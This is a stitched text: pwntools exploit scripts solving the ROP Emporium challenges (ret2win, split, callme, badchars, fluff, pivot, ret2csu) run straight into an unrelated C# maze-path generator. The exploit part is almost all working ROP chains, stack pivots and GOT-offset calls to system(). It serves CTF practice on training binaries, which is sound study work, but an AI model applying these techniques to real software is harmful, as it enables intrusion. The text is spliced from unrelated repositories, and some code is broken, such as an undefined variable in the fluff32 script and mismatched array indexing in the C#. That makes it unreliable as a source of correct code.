r.call(elf.plt['system'], [0x601060])
r.call('main')
payload = r.chain()
io.recvuntil('>')
io.sendline(payload)
io.recvuntil('!\n')
flag = io.recvline().decode().rstrip()
log.success("Flag: {}".format(flag))
<file_sep>#!/bin/python3
from pwn import *
context.clear(arch='amd64')
filename = './ret2csu'
elf = ELF(filename)
io = process(filename)
# variables
dead = p64(0xdeadbeefdeadbeef)
cafe = p64(0xcafebabecafebabe)
dood = p64(0xd00df00dd00df00d)
# gadgets
r1 = ROP(elf)
csu_mov = p64(0x400680)
csu_pop = p64(0x40069a) # pop rbx, rbp, r12, r13, r14, r15; ret;
csu_r12 = p64(0x600e30) # r12(.dyn) + rbx(0x3) * 8
csu_rbx = p64(0x3) # 0x3 * 8 = offset from .dyn to fini@dyn
csu_rbp = p64(0x4) # needed for: add rbx, 0x1; cmp rbp, rbx; jne csu_mov;
csu_fil = p64(0x0)
pop_rdi = p64(r1.rdi.address) # pop rdi; ret;
r2w_plt = p64(elf.plt.ret2win)
r1.raw(cyclic(40))
r1.raw(csu_pop)
r1.raw(csu_rbx)
r1.raw(csu_rbp)
r1.raw(csu_r12)
r1.raw(dead) # arg1
r1.raw(cafe) # arg2
r1.raw(dood) # arg3
r1.raw(csu_mov)
payload = b""
payload += r1.chain()
# runs through csu pop chain again, fill with 0s
payload += csu_fil * 7
r2 = ROP(elf)
r2.raw(pop_rdi) # csu only moves over dword [mov edi, r13d]
r2.raw(dead)
r2.raw(r2w_plt)
payload += r2.chain()
io.recvuntil('> ')
io.sendline(payload)
io.recvuntil('!\n')
flag = io.recvline().decode().rstrip()
log.success("Flag: {}".format(flag))<file_sep>#!/bin/python3
from pwn import *
context.clear(arch='amd64')
filename = './pivot'
libname = './libpivot.so'
elf = ELF(filename)
lib = ELF(libname)
io = process(filename)
# gadgets
r = ROP(elf)
call_rax = p64(0x4006b0) # call rax;
xchg = p64(0x4009bd) # xchg rax, rsp; ret;
mov_rax_rax = p64(0x4009c0) # mov rax, qword ptr [rax]; ret;
add_rax_rbp = p64(0x4009c4) # add rax, rbp; ret;
pop_rax = p64(r.rax.address) # pop rax; ret;
pop_rbp = p64(r.rbp.address) # pop rbp; ret;
fthold_plt = p64(elf.plt.foothold_function)
fthold_got = p64(elf.got.foothold_function)
ret2win_off = p64(lib.sym.ret2win - lib.sym.foothold_function)
# get leaked address
io.recvuntil("pivot: ")
leak = int(io.recvline().strip()[0:14], 16)
log.info('Leaked: ' + hex(leak))
leak = p64(leak)
# stack smash
# putting leaked address into rsp
smash = ROP(elf)
smash.raw(cyclic(40))
smash.raw(pop_rax)
smash.raw(leak)
smash.raw(xchg) # put leaked address into rsp
# set up flthold@got.plt
rop = ROP(elf)
rop.raw(fthold_plt) # gen .got.plt
rop.raw(pop_rax)
rop.raw(fthold_got) # gen .got.plt
# call ret2win using fthold address + offset
rop.raw(mov_rax_rax) # mov f<EMAIL> address into rax
rop.raw(pop_rbp)
rop.raw(ret2win_off) # ret2win - fthold
rop.raw(add_rax_rbp) # add offset to rax(<EMAIL>)
rop.raw(call_rax) # call rax(now pointing to <EMAIL>)
io.recvuntil('> ')
io.sendline(rop.chain())
io.recvuntil('> ')
io.sendline(smash.chain())
io.recvuntil('vot\n')
flag = io.recvline().decode().rstrip()
log.success("Flag: {}".format(flag))<file_sep>#!/bin/python3
from pwn import *
context.clear(arch='i386')
filename = './fluff32'
elf = ELF(filename)
io = process(filename)
# variables
pext_str = [0xB4B,0x2DD,0x1D46,0xB5A,0xDB,0xACD,0x1AC5,0xACD]
# gadgets
'''
xchg swaps memory with register:
temp = dest;
dest = src;
src = temp;
bswap will swap endianess
pext
mov eax, ebp;
mov ebx, 0xb0bababa;
pext edx, ebx, eax;
mov eax, 0xdeadbeef;
ret;
edx = pext(ebx[src], eax[mask])
see masks.txt
f = 0xB4B
l = 0x2DD
a = 0x1D46
g = 0xB5A
. = 0xDB
t = 0xACD
x = 0x1AC5
t = 0xACD
'''
xchg = p32(0x8048555) # xchg byte ptr [ecx], dl; ret;
pext = p32(0x8048543) # see comment block above
pop_ecx_bswap = p32(0x8048558) # pop ecx; bswap ecx; ret;
pop_ebp = p32(0x80485bb) # pop ebp; ret;
bss = elf.bss()
# helper functions
p = make_packer(32, endian='big', sign='unsigned')
def write_string(string, index):
rop = ROP(elf)
rop.raw(pop_ebp)
rop.raw(pext_str[index]) # mask
rop.raw(pext)
rop.raw(pop_ecx_bswap)
rop.raw(p(bss+index)) # big endian
rop.raw(xchg) # swap reg/mem*
return rop.chain()
# main
payload = b""
payload += cyclic(44)
for i in range(0,8):
payload += write_string(input_string, i)
r = ROP(elf)
r.call('print_file', [bss])
payload += r.chain()
io.recvuntil('>')
io.sendline(payload)
io.recvuntil('!\n')
flag = io.recvline().decode().rstrip()
log.success("Flag: {}".format(flag))<file_sep># ROP Emporium 2020
Solutions/writeup to the new [ROP Emporium](https://ropemporium.com/index.html) 32bit and 64bit bins that were updated July 2020.
<file_sep>#!/bin/python3
from pwn import *
context.clear(arch='amd64')
filename = './callme'
elf = ELF(filename)
io = process(filename)
# variables
dead = 0xdeadbeefdeadbeef
cafe = 0xcafebabecafebabe
dood = 0xd00df00dd00df00d
r = ROP(elf)
r.raw(cyclic(40))
r.call(elf.plt['callme_one'],[dead, cafe, dood])
r.call(elf.plt['callme_two'],[dead, cafe, dood])
r.call(elf.plt['callme_three'],[dead, cafe, dood])
payload = r.chain()
io.recvuntil('>')
io.sendline(payload)
io.recvuntil('two() called correctly\n')
flag = io.recvline().decode().rstrip()
log.success("Flag: {}".format(flag))<file_sep>#!/bin/python3
from pwn import *
context.clear(arch='amd64')
filename = './badchars'
elf = ELF(filename)
io = process(filename)
# variables
flag_string = b'flce,tzt'
# gadgets
r = ROP(elf)
mov = p64(0x400634) # mov qword [r13], r12; retn;
xor = p64(0x400628) # xor byte [r15], r14b; retn;
pop_r12 = p64(r.r12.address) # 0x40069c: pop r12, pop r13, pop r14, pop r15, retn;
pop_r14 = p64(r.r14.address) # 0x4006a0: pop r14, pop r15, retn;
bss = elf.bss()
# bad chars 'x' 'g' 'a' '.'
# xor'd string 'flce,tzt'
# 0x02 key at indexes [2,3,4,6]
r.raw(cyclic(40))
# write & xor index 2
r.raw(pop_r12) # pop r12, r13, r14, r15
r.raw(flag_string) # load string
r.raw(p64(bss)) # string location
r.raw(0x2) # xor key
r.raw(p64(bss+2)) # xor index 2 location (1 byte)
r.raw(mov) # write string
r.raw(xor) # xor index 2
# xor index 3
r.raw(pop_r14) # pop r14, r15
r.raw(0x2) # xor key
r.raw(p64(bss+3)) # xor index 3
r.raw(xor)
# xor index 4
r.raw(pop_r14) # pop r14, r15
r.raw(0x2) # xor key
r.raw(p64(bss+4)) # xor index 4
r.raw(xor)
# xor index 6
r.raw(pop_r14) # pop r14, r15
r.raw(0x2) # xor key
r.raw(p64(bss+6)) # xor index 6
r.raw(xor)
# call print_file
r.call('print_file', [bss])
payload = r.chain()
io.recvuntil('>')
io.sendline(payload)
io.recvuntil('!\n')
flag = io.recvline().decode().rstrip()
log.success("Flag: {}".format(flag))
<file_sep>#!/bin/python3
from pwn import *
context.clear(arch='amd64')
filename = './fluff'
elf = ELF(filename)
io = process(filename)
# variables
input_string = b'flag.txt'
char_addresses = []
# gadgets
r = ROP(elf)
xlat = p64(0x400628) # xlatb; ret;
bextr = p64(0x40062a) # pop rdx; pop rcx; add rcx, 0x3ef2; bextr rbx, rcx, rdx; ret;
stosb = p64(0x400639) # stosb byte ptr [rdi], al; ret;
pop_rdi = p64(r.rdi.address) # pop rdi; ret;
bss = elf.bss()
# helper functions
def find_string(string):
f = elf.file.read()
for i in string:
offset = f.find(i)
address = 0x400000 + offset
char_addresses.append(address)
def write_string(string, index):
rop = ROP(elf)
curr_rax = 0xb
if(index != 0):
curr_rax = string[index-1]
rop.raw(bextr)
rop.raw(0x4000)
p = char_addresses[index] - curr_rax - 0x3ef2
rop.raw(p64(p))
rop.raw(xlat)
rop.raw(pop_rdi)
rop.raw(p64(bss+index))
rop.raw(stosb)
return rop.chain()
# main
find_string(input_string)
payload = b''
payload += cyclic(40)
for i in range(0,8):
payload += write_string(input_string, i)
r.call('print_file', [bss])
payload += r.chain()
io.recvuntil('>')
io.sendline(payload)
io.recvuntil('!\n')
flag = io.recvline().decode().rstrip()
log.success("Flag: {}".format(flag))<file_sep>val = 'flag.txt'
res = '\n'.join(format(ord(i), 'b') for i in val)
print("{}".format(res))<file_sep>#!/bin/python3
from pwn import *
context.clear(arch='i386')
filename = './split32'
elf = ELF(filename)
io = process(filename)
r = ROP(elf)
r.raw(cyclic(44))
r.call(elf.plt['system'], [0x0804a030])
r.call('main')
payload = r.chain()
io.recvuntil('>')
io.sendline(payload)
io.recvuntil('!\n')
flag = io.recvline().decode().rstrip()
log.success("Flag: {}".format(flag))
<file_sep>#!/bin/python3
from pwn import *
context.clear(arch='i386')
filename = './pivot32'
libname = './libpivot32.so'
elf = ELF(filename)
lib = ELF(libname)
io = process(filename)
# gadgets
r = ROP(elf)
call_eax = p32(0x80485f0) # call eax;
xchg = p32(0x804882e) # xchg eax, esp; ret;
mov_eax_eax = p32(0x8048830) # mov eax, dword ptr [eax]; ret;
add_eax_ebx = p32(0x8048833) # add eax, ebx; ret;
pop_eax = p32(0x804882c) # pop eax; ret;
pop_ebx = p32(0x80484a9) # pop ebx; ret;
fthold_plt = p32(elf.plt.foothold_function)
fthold_got = p32(elf.got.foothold_function)
ret2win_off = p32(lib.sym.ret2win - lib.sym.foothold_function)
# get leaked address
io.recvuntil("pivot: ")
leak = int(io.recvline().strip()[0:10], 16)
log.info('Leaked: ' + hex(leak))
leak = p32(leak)
# stack smash
# putting leaked address into esp
smash = ROP(elf)
smash.raw(cyclic(44))
smash.raw(pop_eax)
smash.raw(leak)
smash.raw(xchg) # put leaked address into esp
# set up <EMAIL>
rop = ROP(elf)
rop.raw(fthold_plt) # gen .got.plt
rop.raw(pop_eax)
rop.raw(fthold_got) # gen .got.plt
# call ret2win using fthold address + offset
rop.raw(mov_eax_eax) # mov <EMAIL> address into eax
rop.raw(pop_ebx)
rop.raw(ret2win_off) # ret2win - fthold
rop.raw(add_eax_ebx) # add offset to eax(<EMAIL>)
rop.raw(call_eax) # call eax(now pointing to <EMAIL>)
io.recvuntil('> ')
io.sendline(rop.chain())
io.recvuntil('> ')
io.sendline(smash.chain())
io.recvuntil('vot\n')
flag = io.recvline().decode().rstrip()
log.success("Flag: {}".format(flag))<file_sep>#!/bin/python3
from pwn import *
context.clear(arch='amd64')
filename = './ret2win'
elf = ELF(filename)
io = process(filename)
r = ROP(elf)
r.raw(cyclic(40))
r.call('ret2win')
payload = r.chain()
io.recvuntil('>')
io.sendline(payload)
io.recvuntil(':\n')
flag = io.recvline().decode().rstrip()
log.success("Flag: {}".format(flag))<file_sep>#!/bin/python3
from pwn import *
context.clear(arch='i386')
filename = './callme32'
elf = ELF(filename)
io = process(filename)
# variables
dead = 0xdeadbeef
cafe = 0xcafebabe
dood = 0xd00df00d
r = ROP(elf)
r.raw(cyclic(44))
r.call(elf.plt['callme_one'], [dead, cafe, dood])
r.call(elf.plt['callme_two'], [dead, cafe, dood])
r.call(elf.plt['callme_three'], [dead, cafe, dood])
payload = r.chain()
io.recvuntil('>')
io.sendline(payload)
io.recvuntil('two() called correctly\n')
flag = io.recvline().decode().rstrip()
log.success("Flag: {}".format(flag))
|
2d55cdbe293c9324901293ddd85609e6f2080317
|
[
"Markdown",
"Python"
] | 16
|
Python
|
oopsmishap/rop-emporium
|
81d86ce6fb5d5a8b98a1ac7f313c209e51202891
|
add1fd24716429e162d3cf20ea3b72f3223539a1
|
refs/heads/master
|
<repo_name>Morigun/PathCreator<file_sep>/PathCreator/Program.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Reflection;
using System.Text;
using System.Threading.Tasks;
namespace PathCreator
{
class Program
{
static ElementPath[,] ep;
/*Текущий путь*/
static int iTecPath = 0;
static int iX = 50, iY = 50;
/*Поле*/
static int[,] iPole = new int[iX, iY];
/*Поле класс*/
static Field[,] fPole = new Field[iX, iY];
/*Кол-во тупиков*/
static int iCountEndPath;
/*Кол-во поворотов*/
static int iCountPov;
/*Длина главного пути*/
static int iLengthPath;
/*Текущее направление*/
static int iTecDir;
/*Кол-во использованных путей*/
static int iCountEPEnded = 1;
/*Длина доп пути*/
static int iLengthDopPath;
/*Текущий поворот*/
static int iTecPov;
static bool bLuck;
static Random rndCEP = new Random();
static Random rndCP = new Random();
static Random rndLP = new Random();
static Random rndDir = new Random();
static Random rndPov = new Random();
public static Field.Symb[] sTab = new Field.Symb[17];
static void Main(string[] args)
{
/*Инициализация поля*/
//InicPole();
InicFPole();
VivodfPole();
InicSTab();
/*Вывод поля*/
//VivodPole();
Console.WriteLine("GENERATE");
/*Генерация кол-ва тупиков*/
iCountEndPath = rndCEP.Next(20, 30);
/*Генерация длины пути*/
iLengthPath = GenSymplePath(0, 25, 25);
/*Инициализируем тупики + основной путь*/
ep = new ElementPath[iLengthPath, iCountEndPath + 1];
/*Генерация кол-ва поворотов*/
iCountPov = rndCP.Next(5, 11);
/*Цикл заполнения поля*/
//GenForPath(iLengthPath, 0);
GenForFPath(iLengthPath, 0);
//VivodPole();
VivodfPole();
Console.ReadLine();
}
static void InicPole()
{
for (int x = 0; x < iX; x++)
for (int y = 0; y < iY; y++)
iPole[x, y] = 0;
iPole[25, 25] = 9;
}
static void InicFPole()
{
for (int x = 0; x < iX; x++)
for (int y = 0; y < iY; y++)
fPole[x, y] = new Field();
fPole[0, 0] = new Field((char)'╔');
}
static void VivodPole()
{
for (int x = 0; x < iX; x++)
{
for (int y = 0; y < iY; y++)
{
Console.Write("{0}",iPole[x, y],x,y);
}
Console.WriteLine();
}
}
static void VivodfPole()
{
for (int x = 0; x < iX; x++)
{
for (int y = 0; y < iY; y++)
{
Console.Write("{0}", fPole[x, y].ToString(), x, y);
}
Console.WriteLine();
}
}
static Coordinats.Coord SetPosPath(Coordinats.Coord c, int iPath, int d)
{
int x, y;
x = c.GetX();
y = c.GetY();
switch (d)
{
case 0:
//iPole[x - 1, y] = 1;
iPole[x, y] = 1;
ep[iPath].SetCoord(c);
Console.WriteLine("ZN {0} DIR 0 NEW X{1} NEW Y{2} X{3} Y{4}", 1, x - 1, y, x, y);
return new Coordinats.Coord(x - 1, y);
case 1:
//iPole[x, y + 1] = 2;
iPole[x, y] = 2;
ep[iPath].SetCoord(c);
Console.WriteLine("ZN {0} DIR 1 NEW X{1} NEW Y{2} X{3} Y{4}", 2, x, y + 1, x, y);
return new Coordinats.Coord(x, y + 1);
case 2:
//iPole[x + 1, y] = 3;
iPole[x, y] = 3;
ep[iPath].SetCoord(c);
Console.WriteLine("ZN {0} DIR 2 NEW X{1} NEW Y{2} X{3} Y{4}", 3, x + 1, y, x, y);
return new Coordinats.Coord(x + 1, y);
case 3:
//iPole[x, y - 1] = 4;
iPole[x, y] = 4;
ep[iPath].SetCoord(c);
Console.WriteLine("ZN {0} DIR 3 NEW X{1} NEW Y{2} X{3} Y{4}", 4, x, y - 1, x, y);
return new Coordinats.Coord(x, y - 1);
}
return new Coordinats.Coord(c);
}
//static bool CheckCoord(Coordinats.Coord c, int d)
//{
// int x, y;
// x = c.GetX();
// y = c.GetY();
// try
// {
// switch (d)
// {
// case 0: //Nort
// if (iPole[x - 1, y] != 1 && iPole[x - 1, y] != 2 && iPole[x - 1, y] != 3 && iPole[x - 1, y] != 4 && iPole[x, y - 1] != 9)
// {
// return true;
// }
// else
// return false;
// case 1: //East
// if (iPole[x, y + 1] != 1 && iPole[x, y + 1] != 2 && iPole[x, y + 1] != 3 && iPole[x, y + 1] != 4 && iPole[x, y - 1] != 9)
// {
// return true;
// }
// else
// return false;
// case 2: //South
// if (iPole[x + 1, y] != 1 && iPole[x + 1, y] != 2 && iPole[x + 1, y] != 3 && iPole[x + 1, y] != 4 && iPole[x, y - 1] != 9)
// {
// return true;
// }
// else
// return false;
// case 3: //West
// if (iPole[x, y - 1] != 1 && iPole[x, y - 1] != 2 && iPole[x, y - 1] != 3 && iPole[x, y - 1] != 4 && iPole[x, y - 1] != 9)
// {
// return true;
// }
// else
// return false;
// }
// return false;
// }
// catch(System.IndexOutOfRangeException ex)
// {
// return false;
// }
//}
static bool CheckFCoord(Coordinats.Coord c, int d)
{
int x, y;
x = c.GetX();
y = c.GetY();
try
{
switch (d)
{
case 0: //Nort
if (fPole[x - 1, y].GetVal() == Field.cVoid)
{
return true;
}
else
return false;
case 1: //East
if (fPole[x, y + 1].GetVal() == Field.cVoid)
{
return true;
}
else
return false;
case 2: //South
if (fPole[x + 1, y].GetVal() == Field.cVoid)
{
return true;
}
else
return false;
case 3: //West
if (fPole[x, y - 1].GetVal() == Field.cVoid)
{
return true;
}
else
return false;
}
}
catch (System.Exception ex)
{
return false;
}
return false;
}
public static void InicSTab()
{
sTab[0] = new Field.Symb("01300", '╔');
sTab[1] = new Field.Symb("02230", '╦');
sTab[2] = new Field.Symb("01200", '╗');
sTab[3] = new Field.Symb("02120", '╠');
sTab[4] = new Field.Symb("03123", '╬');
sTab[5] = new Field.Symb("02130", '╣');
sTab[6] = new Field.Symb("01100", '╚');
sTab[7] = new Field.Symb("42120", '╩');
sTab[8] = new Field.Symb("41100", '╝');
sTab[9] = new Field.Symb("41200", '═');
sTab[10] = new Field.Symb("11300", '║');
sTab[11] = new Field.Symb("31000", '╔');
sTab[12] = new Field.Symb("12000", '╠');
sTab[13] = new Field.Symb("11000", '╚');
sTab[14] = new Field.Symb("11400", '╝');
sTab[15] = new Field.Symb("21400", '═');
sTab[16] = new Field.Symb("11300", '║');
/*sTab[17] = new Field.Symb("00000", '█');
sTab[18] = new Field.Symb("00000", '█');
sTab[19] = new Field.Symb("00000", '█');
sTab[20] = new Field.Symb("00000", '█');
sTab[21] = new Field.Symb("00000", '█');
sTab[22] = new Field.Symb("00000", '█');*/
}
//static void GenForPath(int iPathLen, int iCoun)
//{
// int iFTecDir, iFTecPov, iFTecPath = 0;
// iFTecPath = iFTecPath + iCoun;
// for (int p = 0; p < iPathLen; p++ )
// {
// using (System.IO.StreamWriter file = new System.IO.StreamWriter(Environment.CurrentDirectory + @"\log.txt", true))
// {
// file.WriteLine("TEST {0} {1} {2}", p, iCountPov, iCountEndPath);
// }
// iFTecDir = ElementPath.CheckDir(rndDir.Next(0, 101));
// iFTecPov = ElementPath.CheckPov(rndPov.Next(0,101));
// /*Устанавливаем направление*/
// ep[iFTecPath].SetDirection(iFTecDir);
// /*Устанавливаем поворот*/
// ep[iFTecPath].SetPovorot(iFTecPov);
// if (iFTecPov == 0)
// {
// if (CheckCoord(ep[iFTecPath].Cord, iFTecDir) == true)
// {
// /*Установить элемент пути*/
// ep[iFTecPath].SetCoord(SetPosPath(ep[iFTecPath].Cord, iFTecPath, iFTecDir));
// iPathLen--;
// bLuck = true;
// }
// else
// {
// p--;
// bLuck = false;
// }
// }
// else
// {
// if (iCountPov != 0)
// {
// if (iCountEndPath > iFTecPath)
// {
// for (int p2 = 0; p2 < iFTecPov; p2++)
// {
// GenForPath(GenSymplePath(iFTecPath + 1, ep[iFTecPath].Cord.GetX(), ep[iFTecPath].Cord.GetY()), iFTecPath+1);
// }
// iCountEndPath--;
// }
// iCountPov--;
// }
// }
// }
//}
static Coordinats.Coord SetPosFPath(Coordinats.Coord c, int iPath, int d, int p)
{
int x, y;
x = c.GetX();
y = c.GetY();
switch (d)
{
case 0:
//iPole[x - 1, y] = 1;
fPole[x, y].SetValue(/*Field.cCUPer*/GetNextEl(ep[iPath].GetPrevDirInt(),p,d), ep[iPath]); //= 1;
ep[iPath].SetCoord(c);
Console.WriteLine("ZN {0} DIR 0 NEW X{1} NEW Y{2} X{3} Y{4}", 1, x - 1, y, x, y);
return new Coordinats.Coord(x - 1, y);
case 1:
//iPole[x, y + 1] = 2;
fPole[x, y].SetValue(GetNextEl(ep[iPath].GetPrevDirInt(), p, d), ep[iPath]);
ep[iPath].SetCoord(c);
Console.WriteLine("ZN {0} DIR 1 NEW X{1} NEW Y{2} X{3} Y{4}", 2, x, y + 1, x, y);
return new Coordinats.Coord(x, y + 1);
case 2:
//iPole[x + 1, y] = 3;
fPole[x, y].SetValue(GetNextEl(ep[iPath].GetPrevDirInt(), p, d), ep[iPath]);
ep[iPath].SetCoord(c);
Console.WriteLine("ZN {0} DIR 2 NEW X{1} NEW Y{2} X{3} Y{4}", 3, x + 1, y, x, y);
return new Coordinats.Coord(x + 1, y);
case 3:
//iPole[x, y - 1] = 4;
fPole[x, y].SetValue(GetNextEl(ep[iPath].GetPrevDirInt(), p, d), ep[iPath]);
ep[iPath].SetCoord(c);
Console.WriteLine("ZN {0} DIR 3 NEW X{1} NEW Y{2} X{3} Y{4}", 4, x, y - 1, x, y);
return new Coordinats.Coord(x, y - 1);
}
return new Coordinats.Coord(c);
}
static void GenForFPath(int iPathLen, int iCoun, int iFTP = 0)
{
int iFTecDir, iFTecPov, iFTecPath = 0;
iFTecPath = iFTecPath + iCoun;
for (int p = 0; p < iPathLen; p++)
{
using (System.IO.StreamWriter file = new System.IO.StreamWriter(Environment.CurrentDirectory + @"\log.txt", true))
{
file.WriteLine("TEST {0} {1} {2}", p, iCountPov, iCountEndPath);
}
iFTecDir = ElementPath.CheckDir(rndDir.Next(0, 101));
iFTecPov = ElementPath.CheckPov(rndPov.Next(0, 101));
/*Устанавливаем направление*/
ep[iFTecPath].SetDirection(iFTecDir);
/*Устанавливаем поворот*/
ep[iFTecPath].SetPovorot(iFTecPov);
if (iFTecPov == 0)
{
if (CheckFCoord(ep[iFTecPath].Cord[ep[iFTecPath].Cord.Count-1], iFTecDir) == true)
{
/*Установить элемент пути*/
ep[iFTecPath].SetCoord(SetPosFPath(ep[iFTecPath].Cord[ep[iFTecPath].Cord.Count - 1], iFTecPath, iFTecDir, iFTP));
iPathLen--;
bLuck = true;
}
else
{
p--;
bLuck = false;
}
}
/*Доп путь*/
else
{
if (iCountPov != 0)
{
if (iCountEndPath > iFTecPath)
{
for (int p2 = 0; p2 < iFTecPov; p2++)
{
GenForFPath(GenSymplePath(iFTecPath + 1, ep[iFTecPath].Cord[ep[iFTecPath].Cord.Count - 1].GetX(), ep[iFTecPath].Cord[ep[iFTecPath].Cord.Count - 1].GetY()), iFTecPath + 1, iFTecPov);
}
iCountEndPath--;
}
iCountPov--;
}
}
}
}
static char GetNextEl(int iIn, int iCountIn, int iDir)
{
string sCode = String.Format("{0}{1}{2}{3}{4}",iIn,iCountIn,iDir,0,0);
foreach (Field.Symb c in sTab)
{
Console.WriteLine("{0}{1}{2}{3}{4} {5} {6}", iIn, iCountIn, iDir, 0, 0, sCode, c.sCode);
if (c.sCode == sCode)
return c.cSym;
}
return Field.cVoid;
}
static int GenSymplePath(int iPathNum, int iX, int iY)
{
int iTempPath;
/*Генерация длины пути*/
iTempPath = rndLP.Next(500, 1000);
/*Инициализация текущего направления на восток или юг*/
iTecDir = rndDir.Next(0, 4);
/*Инициализация главного пути*/
ep[iPathNum] = new ElementPath(iTempPath, 0, 0, iTecDir, iX, iY);
return iTempPath;
}
/*static int GetStartPath(int i)
{
if (ep[i].Cord[ep[i].Cord.Count-1] == ep[i].Cord[ep[i].Cord.Count-2])
}*/
}
}
<file_sep>/PathCreator/Field.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace PathCreator
{
class Field
{
public const char cLUUg = '╔', cCUPer = '╦', cURUg = '╗';
public const char cLCUg = '╠', cCCPer = '╬', cCRUg = '╣';
public const char cLDUg = '╚', cCDPer = '╩', cDRUg = '╝';
public const char cInOutG = '═';
public const char cInOutV = '║';
public const char cVoid = '█';
public struct Symb
{
public string sCode;
public char cSym;
public Symb(string sC, char cS)
{
this.sCode = sC;
this.cSym = cS;
}
}
char cValue;
bool bUsed
{
get;
set;
}
ElementPath ep;
public Field()
{
SetDef();
}
public Field(char cv)
{
this.cValue = cv;
}
public void SetValue(char cV, ElementPath e)
{
this.cValue = cV;
this.ep = e;
this.bUsed = true;
}
public void SetDef()
{
this.cValue = cVoid;
this.bUsed = false;
}
public override string ToString()
{
return this.cValue.ToString();
}
public char GetVal()
{
return this.cValue;
}
public char GetEl(char cPr, int iTecDir, int iTecPov, int iNewDir)
{
if (iTecPov == 0)
{
switch (cPr)
{
/*Верх*/
case cLUUg:
if (iTecDir == 1)
return cInOutG;
else if (iTecDir == 2)
return cInOutV;
break;
case cCUPer:
if (iTecDir == 1 || iTecDir == 3)
return cInOutG;
else if (iTecDir == 2)
return cInOutV;
break;
case cURUg:
if (iTecDir == 3)
return cInOutG;
else if (iTecDir == 2)
return cInOutV;
break;
/*Центр*/
case cLCUg:
if (iTecDir == 1)
return cInOutG;
else if (iTecDir == 2 || iTecDir == 0)
return cInOutV;
break;
case cCCPer:
if (iTecDir == 1 || iTecDir == 3)
return cInOutG;
else if (iTecDir == 2 || iTecDir == 0)
return cInOutV;
break;
case cCRUg:
if (iTecDir == 3)
return cInOutG;
else if (iTecDir == 2 || iTecDir == 0)
return cInOutV;
break;
/*Низ*/
case cLDUg:
if (iTecDir == 1)
return cInOutG;
else if (iTecDir == 0)
return cInOutV;
break;
case cCDPer:
if (iTecDir == 3 || iTecDir == 1)
return cInOutG;
else if (iTecDir == 0)
return cInOutV;
break;
case cDRUg:
if (iTecDir == 3)
return cInOutG;
else if (iTecDir == 0)
return cInOutV;
break;
/*Горизонталь*/
case cInOutG:
return cInOutG;
/*Вертикаль*/
case cInOutV:
return cInOutV;
}
}
else if (iTecPov == 1)
{
switch (cPr)
{
case cLUUg:
break;
}
return cVoid;
}
else if (iTecPov == 2)
{
return cVoid;
}
return cVoid;
}
}
}
<file_sep>/PathCreator/Coordinats.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace PathCreator
{
class Coordinats
{
public struct Coord
{
public int x
{
get;
set;
}
public int y
{
get;
set;
}
public Coord (int iX, int iY) : this()
{
x = iX;
y = iY;
}
public Coord (Coord c) : this()
{
x = c.x;
y = c.y;
}
public int GetX()
{
return this.x;
}
public int GetY()
{
return this.y;
}
}
}
}
<file_sep>/PathCreator/ElementPath.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace PathCreator
{
class ElementPath
{
public enum ePovorot { Simple = 0, Two = 1, Triple = 2 };
public enum eDirection { north = 0, west = 1, east = 2, south = 3 };
public int iLength
{
get;
set;
}
public List<eDirection> eDirArr
{
get;
set;
}
public List<ePovorot> ePovArr
{
get;
set;
}
public ePovorot pov
{
get;
set;
}
public eDirection dir
{
get;
set;
}
bool bGlav
{
get;
set;
}
bool bEnd
{
get;
set;
}
public List<Coordinats.Coord> Cord;
int ID
{
get;
set;
}
public ElementPath()
{
this.ID = 0;
this.iLength = 0;
this.bGlav = true;
this.bEnd = false;
this.ePovArr = new List<ePovorot>();
SetPovorot(1);
this.eDirArr = new List<eDirection>();
SetDirection(1);
this.Cord = new List<Coordinats.Coord>();
SetCoord(0, 0);
}
public ElementPath(int iLen, int i, int p, int d, int x, int y)
{
this.ID = i;
this.iLength = iLen;
if (i == 0)
this.bGlav = true;
else
this.bGlav = false;
this.bEnd = false;
this.ePovArr = new List<ePovorot>();
SetPovorot(p);
this.eDirArr = new List<eDirection>();
SetDirection(d);
this.Cord = new List<Coordinats.Coord>();
SetCoord(x, y);
}
public void SetEnd()
{
this.bEnd = true;
}
public void SetPovorot(int p)
{
switch(p)
{
case 0:
this.pov = ePovorot.Simple;
this.ePovArr.Add(ePovorot.Simple);
break;
case 1:
this.pov = ePovorot.Two;
this.ePovArr.Add(ePovorot.Two);
break;
case 2:
this.pov = ePovorot.Triple;
this.ePovArr.Add(ePovorot.Triple);
break;
}
}
public void SetDirection(int d)
{
switch (d)
{
case 0:
this.dir = eDirection.north;
this.eDirArr.Add(eDirection.north);
break;
case 1:
this.dir = eDirection.east;
this.eDirArr.Add(eDirection.east);
break;
case 2:
this.dir = eDirection.south;
this.eDirArr.Add(eDirection.south);
break;
case 3:
this.dir = eDirection.west;
this.eDirArr.Add(eDirection.west);
break;
}
}
public eDirection GetPrevDir()
{
if (this.eDirArr.Count > 1)
return this.eDirArr[this.eDirArr.Count - 2];
else
return this.eDirArr[this.eDirArr.Count - 1];
}
public int GetPrevDirInt()
{
int iMin;
if (this.eDirArr.Count > 1)
iMin = 2;
else
iMin = 1;
switch (this.eDirArr[this.eDirArr.Count - iMin])
{
case eDirection.east:
return 1;
case eDirection.north:
return 0;
case eDirection.south:
return 2;
case eDirection.west:
return 3;
}
return 0;
}
public int GetTecDirInt()
{
switch (this.eDirArr[this.eDirArr.Count - 1])
{
case eDirection.east:
return 1;
case eDirection.north:
return 0;
case eDirection.south:
return 2;
case eDirection.west:
return 3;
}
return 0;
}
public eDirection GetTecDir()
{
return this.eDirArr[this.eDirArr.Count - 1];
}
public ePovorot GetPrevPov()
{
if (this.ePovArr.Count > 1)
return this.ePovArr[this.ePovArr.Count - 2];
else
return this.ePovArr[this.ePovArr.Count - 1];
}
public int GetPrevPovInt()
{
int iMin;
if (this.ePovArr.Count > 1)
iMin = 2;
else
iMin = 1;
switch (this.ePovArr[this.ePovArr.Count - iMin])
{
case ePovorot.Simple:
return 0;
case ePovorot.Two:
return 1;
case ePovorot.Triple:
return 2;
}
return 0;
}
public int GetTecPovInt()
{
switch (this.ePovArr[this.ePovArr.Count - 1])
{
case ePovorot.Simple:
return 0;
case ePovorot.Two:
return 1;
case ePovorot.Triple:
return 2;
}
return 0;
}
public ePovorot GetTecPov()
{
return this.ePovArr[this.ePovArr.Count - 1];
}
public void SetCoord(int x, int y)
{
